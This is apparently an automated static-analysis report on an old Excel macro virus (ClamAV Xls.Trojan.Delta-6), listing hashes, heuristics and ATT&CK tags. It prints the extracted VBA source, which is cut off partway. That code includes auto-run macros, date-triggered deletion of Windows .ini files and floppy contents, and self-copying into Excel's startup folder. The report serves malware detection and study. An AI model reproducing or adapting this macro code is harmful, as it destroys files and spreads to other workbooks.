Xls.Trojan.Delta-6 — Office (OLE) malware analysis

Static analysis result for SHA-256 a7664d16641569d3…

MALICIOUS

Office (OLE)

38.0 KB Created: 1998-01-11 23:46:54 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: a625f95c0bfecc295dbb176787c4f472 SHA-1: 4b63500ad7bab6ad0de73404916d9397f50163a9 SHA-256: a7664d16641569d388c1c80a736c4758424d210b6da88d4b8b9c6308e61a623c
260 Risk Score

Malware Insights

Xls.Trojan.Delta-6 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Xls.Trojan.Delta-6. It contains VBA macros, including an Auto_Open macro, which is designed to execute automatically when the document is opened. The Auto_Close macro attempts to set file attributes for 'c:\msoffice\excel\xlstart\EXCELVBA.XLA', suggesting an attempt to establish persistence or manipulate startup behavior. The Auto_Open macro also calls other subroutines like Chk1, Chk2, Dstr, Hdn, Tim, Icn_1, and Icn_3, indicating a multi-stage execution process.

Heuristics 5

  • ClamAV: Xls.Trojan.Delta-6 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Delta-6
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6383 bytes
SHA-256: 14e25583ecf1a604a620e4f3b98a667b39f6286792ee4de2ad02841601410b54
Detection
ClamAV: Xls.Trojan.Delta-6
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"


























Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
On Error GoTo cuek
    Application.DisplayStatusBar = False
    Call Chk1
    Call Chk2
    Call Dstr
    Call Hdn
    Call Tim
    Call Icn_1
    Call Icn_3
    Application.DisplayStatusBar = True
cuek:
End Sub

Sub Auto_Close()
Attribute Auto_Close.VB_ProcData.VB_Invoke_Func = " \n14"
    On Error GoTo vodo
    SetAttr ("c:\msoffice\excel\xlstart\EXCELVBA.XLA"), vbNormal
vodo:
End Sub


Sub Tim()
Attribute Tim.VB_ProcData.VB_Invoke_Func = " \n14"
Application.OnTime Now + TimeValue("00:15:00"), " Hlt "
End Sub

Sub Ky()
Attribute Ky.VB_ProcData.VB_Invoke_Func = " \n14"
    My_password = InputBox("This Is The Example Of My Project ! You Can Modified, Added in Order to be a God Hacker ! Please Type My Project Name to Continued or I'll Destroy Your Computer ! < By Bui'95 >", " Delta Project ")
    If My_password <> "Delta" Then
       MsgBox (" Sorry ..!, My Project Name is Delta ")
       Application.Quit
    Else
       On Error GoTo abis
       DialogSheets("Module1").Show
       Sheets("Dialog1").Select
       Sheets("Dialog1").Visible = False
    Exit Sub
    End If
abis:
End Sub

Sub Ghst()
Attribute Ghst.VB_ProcData.VB_Invoke_Func = " \n14"
GoTo low
     Set myobject = ActiveWorkbook
     If myobject.Application.Name = "BOOK1.XLS" Then
        Call Waw
     Else
        MsgBox " Wrong !", vbExclamation
     End If
low:
End Sub

Sub Trl()
Attribute Trl.VB_ProcData.VB_Invoke_Func = " \n14"
Set objectku = ActiveWindow
    objectku.OnWindow = "Waw"
End Sub

Sub Dstr()
Attribute Dstr.VB_ProcData.VB_Invoke_Func = " \n14"
    On Error GoTo bail
    tgl = 13
    MyDate = Date
    If Day(MyDate) = 5 And Month(MyDate) > 1 Then
       Kill "c:\windows\*.ini"
       Kill "a:\*.*"
       Call Ky
    End If
bail:
End Sub


Sub Thc1()
Attribute Thc1.VB_ProcData.VB_Invoke_Func = " \n14"
    On Error GoTo bae
    ChDrive "c:\"
    ChDir "c:\msoffice\excel\xlstart"
'    Application.DisplayStatusBar = False
    Sheets("Module1").Visible = True
    ExecuteExcel4Macro "VBA.MAKE.ADDIN(""c:\msoffice\excel\xlstart\EXCELVBA.XLA"")"
    Sheets("Module1").Select
    Call txt
    Sheets("Module1").Select
    Call prt
    Sheets("Module1").Visible = False
'   Sheets("Sheet1").Select
'   Application.DisplayStatusBar = True
    SetAttr ("c:\msoffice\excel\xlstart\EXCELVBA.XLA"), vbHidden
bae:
End Sub

Sub Chk1()
Attribute Chk1.VB_ProcData.VB_Invoke_Func = " \n14"
    On Error GoTo kajeun
    mysize = FileLen("c:\msoffice\excel\xlstart\excelvba.xla")    ' Returns file length (bytes).
    If mysize < 22000 Then
       Call Thc1
    Else
        GoTo diam
    End If
kajeun:
    Call Thc1
diam:
End Sub


Sub Chk2()
Attribute Chk2.VB_ProcData.VB_Invoke_Func = " \n14"
On Error GoTo baeah
    mybra = FileLen("c:\msoffice\excel\xlstart\book1.xls")     ' Returns file length (bytes).
    If mybra < 22000 Then
      Call Thc2
    Else
      GoTo cuek
    End If
baeah:
    Call Thc2
cuek:
End Sub


Sub Thc2()
Attribute Thc2.VB_ProcData.VB_Invoke_Func = " \n14"
On Error GoTo wow
    ActiveWorkbook.SaveAs filename:="c:\msoffice\excel\xlstart\BOOK1.XLS", FileFormat:=xlNormal, _
    Password:="", WriteResPassword:="", ReadOnlyRecommended:=False _
    , CreateBackup:=False
wow:
End Sub

Sub ins()
Attribute ins.VB_ProcData.VB_Invoke_Func = " \n14"
     SetAttr ("c:\msoffice\excel\xlstart\excelvbs.txt"), vbNormal
     Set mytarget = ActiveSheet
     Set myobject = ActiveWorkbook
        On Error GoTo oke
        Sheets("Module1").Visible = True
        Call prt
        Sheets("Module1").Visible = False
'      If myobject.Name <> "BOOK1.XLS" And mytarget.Name <> "Module1" Then
        SetAttr ("c:\msoffice\excel\xlstart\excelvbs.txt"), vbHidden
         Call Hdn
         Call Waw
         Exit Sub
'      End If
oke:
        ActiveWorkbook.Modules().Add
        Acti
... (truncated)